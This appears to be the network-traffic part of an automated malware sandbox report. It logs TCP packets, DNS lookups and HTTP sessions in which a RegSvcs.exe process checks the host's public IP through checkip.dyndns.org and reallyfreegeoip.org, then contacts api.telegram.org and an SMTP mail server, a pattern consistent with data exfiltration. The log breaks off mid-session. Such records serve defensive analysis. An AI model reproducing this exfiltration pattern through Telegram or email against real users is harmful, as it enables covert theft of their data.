Jan 11, 2025 03:00:00.455261946 CET	49708	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:00.455303907 CET	443	49708	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:00.579509020 CET	443	49708	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:00.579646111 CET	443	49708	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:00.579721928 CET	49708	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:00.581140041 CET	49708	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:00.633846045 CET	49709	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:00.638792992 CET	80	49709	193.122.130.0	192.168.2.5
Jan 11, 2025 03:00:00.638983011 CET	49709	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:00.639199018 CET	49709	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:00.643943071 CET	80	49709	193.122.130.0	192.168.2.5
Jan 11, 2025 03:00:05.145407915 CET	80	49709	193.122.130.0	192.168.2.5
Jan 11, 2025 03:00:05.147254944 CET	49710	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:05.147355080 CET	443	49710	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:05.147452116 CET	49710	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:05.147758961 CET	49710	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:05.147799015 CET	443	49710	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:05.198259115 CET	49709	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:05.616190910 CET	443	49710	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:05.618088007 CET	49710	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:05.618124008 CET	443	49710	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:05.768054008 CET	443	49710	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:05.768208027 CET	443	49710	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:05.768266916 CET	49710	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:05.768942118 CET	49710	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:05.773093939 CET	49709	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:05.774069071 CET	49711	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:05.778070927 CET	80	49709	193.122.130.0	192.168.2.5
Jan 11, 2025 03:00:05.778141975 CET	49709	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:05.778883934 CET	80	49711	193.122.130.0	192.168.2.5
Jan 11, 2025 03:00:05.778948069 CET	49711	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:05.779089928 CET	49711	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:05.783853054 CET	80	49711	193.122.130.0	192.168.2.5
Jan 11, 2025 03:00:09.878768921 CET	80	49711	193.122.130.0	192.168.2.5
Jan 11, 2025 03:00:09.883234978 CET	49712	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:09.883292913 CET	443	49712	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:09.883378029 CET	49712	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:09.889261007 CET	49712	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:09.889277935 CET	443	49712	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:09.932678938 CET	49711	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:10.377043009 CET	443	49712	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:10.379209995 CET	49712	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:10.379245996 CET	443	49712	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:10.532830000 CET	443	49712	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:10.532993078 CET	443	49712	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:10.533060074 CET	49712	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:10.534049988 CET	49712	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:10.539524078 CET	49711	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:10.541138887 CET	49713	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:10.544528961 CET	80	49711	193.122.130.0	192.168.2.5
Jan 11, 2025 03:00:10.544594049 CET	49711	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:10.545938969 CET	80	49713	193.122.130.0	192.168.2.5
Jan 11, 2025 03:00:10.546015024 CET	49713	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:10.546164036 CET	49713	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:10.550971031 CET	80	49713	193.122.130.0	192.168.2.5
Jan 11, 2025 03:00:19.077785969 CET	80	49713	193.122.130.0	192.168.2.5
Jan 11, 2025 03:00:19.081717968 CET	49755	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:19.081768036 CET	443	49755	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:19.084075928 CET	49755	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:19.084414005 CET	49755	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:19.084433079 CET	443	49755	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:19.135981083 CET	49713	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:19.559534073 CET	443	49755	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:19.571777105 CET	49755	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:19.571810961 CET	443	49755	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:19.715572119 CET	443	49755	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:19.715636969 CET	443	49755	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:19.715692043 CET	49755	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:19.716406107 CET	49755	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:19.720340014 CET	49713	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:19.721836090 CET	49761	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:19.725333929 CET	80	49713	193.122.130.0	192.168.2.5
Jan 11, 2025 03:00:19.725409985 CET	49713	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:19.726666927 CET	80	49761	193.122.130.0	192.168.2.5
Jan 11, 2025 03:00:19.726744890 CET	49761	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:19.726870060 CET	49761	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:19.731590033 CET	80	49761	193.122.130.0	192.168.2.5
Jan 11, 2025 03:00:26.014272928 CET	80	49761	193.122.130.0	192.168.2.5
Jan 11, 2025 03:00:26.015896082 CET	49791	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:26.015935898 CET	443	49791	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:26.015995026 CET	49791	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:26.016267061 CET	49791	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:26.016278982 CET	443	49791	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:26.057692051 CET	49761	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:26.472274065 CET	443	49791	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:26.485394955 CET	49791	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:26.485421896 CET	443	49791	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:26.630311966 CET	443	49791	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:26.630378008 CET	443	49791	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:26.630428076 CET	49791	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:26.631998062 CET	49791	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:26.641617060 CET	49761	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:26.643131018 CET	49793	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:26.646774054 CET	80	49761	193.122.130.0	192.168.2.5
Jan 11, 2025 03:00:26.646828890 CET	49761	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:26.647924900 CET	80	49793	193.122.130.0	192.168.2.5
Jan 11, 2025 03:00:26.647984028 CET	49793	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:26.648175955 CET	49793	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:26.652960062 CET	80	49793	193.122.130.0	192.168.2.5
Jan 11, 2025 03:00:27.102828026 CET	80	49793	193.122.130.0	192.168.2.5
Jan 11, 2025 03:00:27.104268074 CET	49799	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:27.104290962 CET	443	49799	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:27.104387999 CET	49799	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:27.105535030 CET	49799	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:27.105549097 CET	443	49799	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:27.151447058 CET	49793	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:27.560359001 CET	443	49799	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:27.562416077 CET	49799	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:27.562483072 CET	443	49799	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:27.702523947 CET	443	49799	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:27.702590942 CET	443	49799	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:27.702645063 CET	49799	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:27.703141928 CET	49799	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:27.706819057 CET	49793	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:27.709269047 CET	49800	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:27.711771011 CET	80	49793	193.122.130.0	192.168.2.5
Jan 11, 2025 03:00:27.711826086 CET	49793	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:27.714267969 CET	80	49800	193.122.130.0	192.168.2.5
Jan 11, 2025 03:00:27.714461088 CET	49800	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:27.714637995 CET	49800	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:27.719363928 CET	80	49800	193.122.130.0	192.168.2.5
Jan 11, 2025 03:00:28.439891100 CET	80	49800	193.122.130.0	192.168.2.5
Jan 11, 2025 03:00:28.441649914 CET	49806	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:28.441685915 CET	443	49806	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:28.441764116 CET	49806	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:28.442085028 CET	49806	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:28.442099094 CET	443	49806	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:28.495245934 CET	49800	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:28.906435013 CET	443	49806	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:28.908380032 CET	49806	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:28.908412933 CET	443	49806	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:29.054779053 CET	443	49806	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:29.054852962 CET	443	49806	104.21.80.1	192.168.2.5
Jan 11, 2025 03:00:29.054979086 CET	49806	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:29.055675983 CET	49806	443	192.168.2.5	104.21.80.1
Jan 11, 2025 03:00:29.069839954 CET	49800	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:29.074862003 CET	80	49800	193.122.130.0	192.168.2.5
Jan 11, 2025 03:00:29.075045109 CET	49800	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:29.078141928 CET	49812	443	192.168.2.5	149.154.167.220
Jan 11, 2025 03:00:29.078187943 CET	443	49812	149.154.167.220	192.168.2.5
Jan 11, 2025 03:00:29.078252077 CET	49812	443	192.168.2.5	149.154.167.220
Jan 11, 2025 03:00:29.078790903 CET	49812	443	192.168.2.5	149.154.167.220
Jan 11, 2025 03:00:29.078804016 CET	443	49812	149.154.167.220	192.168.2.5
Jan 11, 2025 03:00:29.689042091 CET	443	49812	149.154.167.220	192.168.2.5
Jan 11, 2025 03:00:29.689130068 CET	49812	443	192.168.2.5	149.154.167.220
Jan 11, 2025 03:00:29.694551945 CET	49812	443	192.168.2.5	149.154.167.220
Jan 11, 2025 03:00:29.694566965 CET	443	49812	149.154.167.220	192.168.2.5
Jan 11, 2025 03:00:29.694809914 CET	443	49812	149.154.167.220	192.168.2.5
Jan 11, 2025 03:00:29.696754932 CET	49812	443	192.168.2.5	149.154.167.220
Jan 11, 2025 03:00:29.739337921 CET	443	49812	149.154.167.220	192.168.2.5
Jan 11, 2025 03:00:29.940592051 CET	443	49812	149.154.167.220	192.168.2.5
Jan 11, 2025 03:00:29.940663099 CET	443	49812	149.154.167.220	192.168.2.5
Jan 11, 2025 03:00:29.940788984 CET	49812	443	192.168.2.5	149.154.167.220
Jan 11, 2025 03:00:29.971720934 CET	49812	443	192.168.2.5	149.154.167.220
Jan 11, 2025 03:00:35.211370945 CET	49707	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:35.404068947 CET	49853	587	192.168.2.5	166.62.28.135
Jan 11, 2025 03:00:35.408843040 CET	587	49853	166.62.28.135	192.168.2.5
Jan 11, 2025 03:00:35.408992052 CET	49853	587	192.168.2.5	166.62.28.135
Jan 11, 2025 03:00:36.432560921 CET	587	49853	166.62.28.135	192.168.2.5
Jan 11, 2025 03:00:36.432832956 CET	49853	587	192.168.2.5	166.62.28.135
Jan 11, 2025 03:00:36.437674046 CET	587	49853	166.62.28.135	192.168.2.5
Jan 11, 2025 03:00:36.767278910 CET	587	49853	166.62.28.135	192.168.2.5
Jan 11, 2025 03:00:36.767575026 CET	49853	587	192.168.2.5	166.62.28.135
Jan 11, 2025 03:00:36.772373915 CET	587	49853	166.62.28.135	192.168.2.5
Jan 11, 2025 03:00:37.100631952 CET	587	49853	166.62.28.135	192.168.2.5
Jan 11, 2025 03:00:37.101229906 CET	49853	587	192.168.2.5	166.62.28.135
Jan 11, 2025 03:00:37.106106997 CET	587	49853	166.62.28.135	192.168.2.5
Jan 11, 2025 03:00:37.439228058 CET	587	49853	166.62.28.135	192.168.2.5
Jan 11, 2025 03:00:37.439259052 CET	587	49853	166.62.28.135	192.168.2.5
Jan 11, 2025 03:00:37.439270973 CET	587	49853	166.62.28.135	192.168.2.5
Jan 11, 2025 03:00:37.439498901 CET	49853	587	192.168.2.5	166.62.28.135
Jan 11, 2025 03:00:37.440205097 CET	587	49853	166.62.28.135	192.168.2.5
Jan 11, 2025 03:00:37.440257072 CET	49853	587	192.168.2.5	166.62.28.135
Jan 11, 2025 03:00:37.440306902 CET	587	49853	166.62.28.135	192.168.2.5
Jan 11, 2025 03:00:37.440319061 CET	587	49853	166.62.28.135	192.168.2.5
Jan 11, 2025 03:00:37.441936016 CET	49853	587	192.168.2.5	166.62.28.135
Jan 11, 2025 03:00:37.449100018 CET	49853	587	192.168.2.5	166.62.28.135
Jan 11, 2025 03:00:37.456602097 CET	587	49853	166.62.28.135	192.168.2.5
Jan 11, 2025 03:00:37.782397032 CET	587	49853	166.62.28.135	192.168.2.5
Jan 11, 2025 03:00:37.786650896 CET	49853	587	192.168.2.5	166.62.28.135
Jan 11, 2025 03:00:37.791423082 CET	587	49853	166.62.28.135	192.168.2.5
Jan 11, 2025 03:00:38.116692066 CET	587	49853	166.62.28.135	192.168.2.5
Jan 11, 2025 03:00:38.118021011 CET	49853	587	192.168.2.5	166.62.28.135
Jan 11, 2025 03:00:38.122848988 CET	587	49853	166.62.28.135	192.168.2.5
Jan 11, 2025 03:00:38.448579073 CET	587	49853	166.62.28.135	192.168.2.5
Jan 11, 2025 03:00:38.448944092 CET	49853	587	192.168.2.5	166.62.28.135
Jan 11, 2025 03:00:38.453783035 CET	587	49853	166.62.28.135	192.168.2.5
Jan 11, 2025 03:00:39.796001911 CET	587	49853	166.62.28.135	192.168.2.5
Jan 11, 2025 03:00:39.796896935 CET	49853	587	192.168.2.5	166.62.28.135
Jan 11, 2025 03:00:39.801702976 CET	587	49853	166.62.28.135	192.168.2.5
Jan 11, 2025 03:00:40.126728058 CET	587	49853	166.62.28.135	192.168.2.5
Jan 11, 2025 03:00:40.126996994 CET	49853	587	192.168.2.5	166.62.28.135
Jan 11, 2025 03:00:40.131822109 CET	587	49853	166.62.28.135	192.168.2.5
Jan 11, 2025 03:00:40.492752075 CET	587	49853	166.62.28.135	192.168.2.5
Jan 11, 2025 03:00:40.495532990 CET	49853	587	192.168.2.5	166.62.28.135
Jan 11, 2025 03:00:40.503026962 CET	587	49853	166.62.28.135	192.168.2.5
Jan 11, 2025 03:00:40.828407049 CET	587	49853	166.62.28.135	192.168.2.5
Jan 11, 2025 03:00:40.829190016 CET	49853	587	192.168.2.5	166.62.28.135
Jan 11, 2025 03:00:40.829272985 CET	49853	587	192.168.2.5	166.62.28.135
Jan 11, 2025 03:00:40.829317093 CET	49853	587	192.168.2.5	166.62.28.135
Jan 11, 2025 03:00:40.829317093 CET	49853	587	192.168.2.5	166.62.28.135
Jan 11, 2025 03:00:40.834074020 CET	587	49853	166.62.28.135	192.168.2.5
Jan 11, 2025 03:00:40.834126949 CET	587	49853	166.62.28.135	192.168.2.5
Jan 11, 2025 03:00:40.834263086 CET	587	49853	166.62.28.135	192.168.2.5
Jan 11, 2025 03:00:40.834290981 CET	587	49853	166.62.28.135	192.168.2.5
Jan 11, 2025 03:00:50.442251921 CET	587	49853	166.62.28.135	192.168.2.5
Jan 11, 2025 03:00:50.495385885 CET	49853	587	192.168.2.5	166.62.28.135
Jan 11, 2025 03:02:15.417788029 CET	49853	587	192.168.2.5	166.62.28.135
Jan 11, 2025 03:02:15.425272942 CET	587	49853	166.62.28.135	192.168.2.5
Jan 11, 2025 03:02:15.751163960 CET	587	49853	166.62.28.135	192.168.2.5
Jan 11, 2025 03:02:15.751825094 CET	49853	587	192.168.2.5	166.62.28.135

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 02:59:56.994334936 CET	56936	53	192.168.2.5	1.1.1.1
Jan 11, 2025 02:59:57.001163960 CET	53	56936	1.1.1.1	192.168.2.5
Jan 11, 2025 02:59:57.946213007 CET	51813	53	192.168.2.5	1.1.1.1
Jan 11, 2025 02:59:57.953315973 CET	53	51813	1.1.1.1	192.168.2.5
Jan 11, 2025 03:00:29.070715904 CET	50541	53	192.168.2.5	1.1.1.1
Jan 11, 2025 03:00:29.077306032 CET	53	50541	1.1.1.1	192.168.2.5
Jan 11, 2025 03:00:35.391242981 CET	51331	53	192.168.2.5	1.1.1.1
Jan 11, 2025 03:00:35.402828932 CET	53	51331	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 02:59:56.994334936 CET	192.168.2.5	1.1.1.1	0x17b1	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:59:57.946213007 CET	192.168.2.5	1.1.1.1	0x53b	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 11, 2025 03:00:29.070715904 CET	192.168.2.5	1.1.1.1	0xfbc9	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jan 11, 2025 03:00:35.391242981 CET	192.168.2.5	1.1.1.1	0xe7d6	Standard query (0)	mail.starofseasmarine.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 02:59:57.001163960 CET	1.1.1.1	192.168.2.5	0x17b1	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 02:59:57.001163960 CET	1.1.1.1	192.168.2.5	0x17b1	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:59:57.001163960 CET	1.1.1.1	192.168.2.5	0x17b1	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:59:57.001163960 CET	1.1.1.1	192.168.2.5	0x17b1	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:59:57.001163960 CET	1.1.1.1	192.168.2.5	0x17b1	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:59:57.001163960 CET	1.1.1.1	192.168.2.5	0x17b1	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:59:57.953315973 CET	1.1.1.1	192.168.2.5	0x53b	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:59:57.953315973 CET	1.1.1.1	192.168.2.5	0x53b	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:59:57.953315973 CET	1.1.1.1	192.168.2.5	0x53b	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:59:57.953315973 CET	1.1.1.1	192.168.2.5	0x53b	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:59:57.953315973 CET	1.1.1.1	192.168.2.5	0x53b	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:59:57.953315973 CET	1.1.1.1	192.168.2.5	0x53b	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:59:57.953315973 CET	1.1.1.1	192.168.2.5	0x53b	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 03:00:29.077306032 CET	1.1.1.1	192.168.2.5	0xfbc9	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Jan 11, 2025 03:00:35.402828932 CET	1.1.1.1	192.168.2.5	0xe7d6	No error (0)	mail.starofseasmarine.com		166.62.28.135	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	193.122.130.0	80	4148	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:59:57.014692068 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 02:59:57.492989063 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 01:59:57 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d9367f2830f17c1583e2d887d6a2835f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 02:59:57.562222004 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 02:59:57.682564974 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 01:59:57 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: abcb0cfd56387ab36c5be0f0b1a8589a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 02:59:58.685292006 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 02:59:58.818803072 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 01:59:58 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4aed181f4717c9581990a281a3d3269a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49707	193.122.130.0	80	4148	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:59:59.468077898 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 02:59:59.952271938 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 01:59:59 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b9315d57c4b954c786e39e654228c7a7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49709	193.122.130.0	80	4148	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 03:00:00.639199018 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 03:00:05.145407915 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:00:05 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 16c55dcb353494c691db980d774ca0ad Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49711	193.122.130.0	80	4148	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 03:00:05.779089928 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
